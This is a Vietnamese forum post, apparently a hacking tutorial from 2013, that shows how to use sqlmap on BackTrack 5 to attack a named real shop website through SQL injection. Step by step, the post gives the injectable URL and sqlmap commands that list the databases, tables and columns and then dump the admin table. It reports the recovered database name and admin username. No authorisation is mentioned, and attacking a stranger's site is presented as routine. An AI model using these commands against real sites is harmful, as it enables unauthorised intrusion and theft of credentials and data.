SQLi dùng bộ sqlmap trong backtrack 5Thảo luận trong 'Kiến thức' bắt đầu bởi crazykid, 14/8/13.

crazykidModerator

Bài viết:

137

Demo: link lỗi sqli http://autohoabinh.com/?page=products_detail&id=296&catid=2'Vào thư mục chưa bộ công cụ sqlmapcd /pentest/database/sqlmap/

đầu tiên ta get database nhéMã:python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" --dbs

ở đây --dbs là databasesthêm 1 số cái nữa như--dbs DBMS databases--tables DBMS database tables--columns DBMS database table columns--schema DBMS schema

--dump dump dữ liệu

Database nhận đc là athb_db nhé.tiếp tục ta get các table như sau

Mã:python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db --tables

table tbl_admin là table chúng ta cần khai thác đúng hok nào,giờ ta lấy các column nhéMã:python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin --columns

kết quả nhận đc như sau

bây giờ ta sẽ dump các trường id,name và pass nhé.ta dump trường id trước nào Mã:python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin -C id --dump

kết quả nhận đc là id ->1tương tự ta dump các trường còn lại Mã: python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin -C name --dump

kết quả nhận đc thì user là admin nhéMã: python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin -C pass --dump

dump đc pass là khoản trắng!!!hic..là sao ta.ko có pass hả ta ) hay là nó ẩn ta.Cơ mà ko sao,biết cách làm là đc ùi,hihi [vì mới thử lại bằng darkmysql cũng nhận đc là khoảng trắng ) ]

Read more: http://root.vn/threads/sqli-dung-bo-sqlmap-trong-backtrack-5.4830/#ixzz3B0NjQLZk